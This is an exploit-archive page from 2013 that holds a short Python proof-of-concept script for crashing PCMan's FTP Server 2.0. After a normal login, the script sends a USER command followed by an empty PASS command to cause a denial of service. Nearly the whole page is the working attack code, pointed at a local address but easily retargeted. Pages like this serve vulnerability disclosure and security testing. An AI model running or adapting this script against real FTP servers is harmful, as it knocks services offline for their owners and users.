PCMan's FTP Server 2.0 Denial Of Service



EKU-ID: 3328 CVE: OSVDB-ID:
Author: Chako Published: 2013-06-27 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/python
#
#
####################################################################
#
# Exploit Title: PCMan's FTP Server 2.0 Empty Password Denial of Service
# Date: 2013/6/26
# Exploit Author: Chako
# Vendor Homepage: http://pcman.openfoundry.org/
# Software Download Link: https://files.secureserver.net/1sMltFOsytirTG
# Version: 2.0
# Tested on: Windows 7 SP1 English
#
#Description:
#      A vulnerability has been identified in PCMan's FTP Server 2.0, 
#      which allows attackers cause a Denial of Service using a 
#      specially crafted request(empty Password).
#
####################################################################



import socket
import sys

USER="chako"
PASSWD="chako"

print("\n\n[+] PCMan's FTP Server 2.0 Empty Password Denial of Service")
print("[+] Version: V2.0")
print("[+] Chako\n\n\n")

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1",21))
data = s.recv(1024)


print("[-] Login to FTP Server...\n")
s.send("USER " + USER + '\r\n')
data = s.recv(1024)
s.send("PASS " + PASSWD + '\r\n')
data = s.recv(1024)



print("[-] Sending exploit...\n")
s.send("USER TEST\r\n'")
s.send("PASS \r\n'")
s.close()

print("[!] Done! Exploit successfully sent\n")